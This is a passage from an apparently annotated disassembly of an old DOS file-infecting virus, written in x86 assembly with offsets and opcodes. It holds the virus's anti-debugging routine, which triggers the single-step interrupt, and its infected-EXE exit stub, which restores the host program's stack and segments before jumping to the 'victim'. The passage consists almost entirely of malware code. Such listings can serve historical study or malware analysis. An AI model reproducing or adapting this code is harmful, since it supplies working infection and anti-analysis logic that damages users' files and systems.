s_1918 ;-> reside virus ;1944 E8 FFD1 l_1947: pop es ;1947 07 ;================================================================ ; ANTYDEBUG - call int 1 = Single Step ;---------------------------------------------------------------- s_1948: pushf ;1948 9C xor ax,ax ;1949 33 C0 mov es,ax ;194B 8E C0 call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004 retn ;1952 C3 s_1938 endp ;================================================================ ; End of virus code - file *.EXE ;---------------------------------------------------------------- l_1953: popf ;1953 9D pop ds ;1954 1F pop es ;1955 07 pop cx ;1956 59 pop bx ;1957 5B mov ax,es ;1958 8C C0 add ax,10h ;relocating value ;195A 05 0010 mov dx,ax ;195D 8B D0 mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1 add bp,ax ;1964 03 E8 mov ss,bp ;1966 8E D5 mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3 mov sp,bp ;196D 8B E5 mov ax,dx ;196F 8B C2 add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6 call s_16CA ;init registers ;1976 E8 FD51 jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4 db 20 dup (0) ;COM file stack ;197E 0014[00] d_0612 label byte ;1992h seg_a ends end start